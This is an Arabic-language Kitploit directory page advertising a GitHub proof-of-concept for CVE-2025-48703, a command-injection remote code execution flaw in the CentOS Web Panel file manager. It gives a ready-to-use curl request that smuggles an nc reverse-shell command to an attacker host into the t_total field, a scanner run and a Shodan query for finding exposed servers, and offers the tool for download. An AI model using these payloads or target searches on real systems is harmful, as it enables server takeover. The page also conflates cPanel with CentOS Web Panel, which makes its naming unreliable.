Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48703 — تنفيذ كود عن بُعد في لوحة تحكم CentOS | Kitploit
أدوات/GitHubGitHub/skynoxk/cve-2025-48703
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

تنفيذ كود عن بُعد في لوحة تحكم CentOS

عرض المستودع
313منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-48703 - تنفيذ التعليمات البرمجية عن بُعد (RCE) في مدير ملفات cPanel

📌 الوصف

CVE-2025-48703 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في وحدة filemanager بلوحة تحكم استضافة ويب (مثل cPanel). تنشأ بسبب عدم تعقيم معالجة المدخلات في دالة acc=changePerm، مما يسمح للمهاجم بحقن وتنفيذ أوامر نظام عشوائية باستخدام معامل t_total.


🧨 التأثير

تسمح هذه الثغرة للمهاجمين بـ:

  • تنفيذ أوامر عشوائية على الخادم المستهدف.
  • إنشاء قشرة عكسية للوصول المستمر.
  • ربما تصعيد الامتيازات أو التحرك جانبيًا.

⚠️ يمكن تنفيذ هذا الهجوم بمصادقة ضئيلة، أو في بعض الإعدادات، دون أي مصادقة.


🚀 إثبات المفهوم (PoC)

✅ أمر القشرة العكسية

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

استخدام الماسح الضوئي

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

بحث Shodan

root@kitploit:~
Server: cwpsrv

المرجع: https://fenrisk.com/rce-centos-webpanel

تنزيل الأداة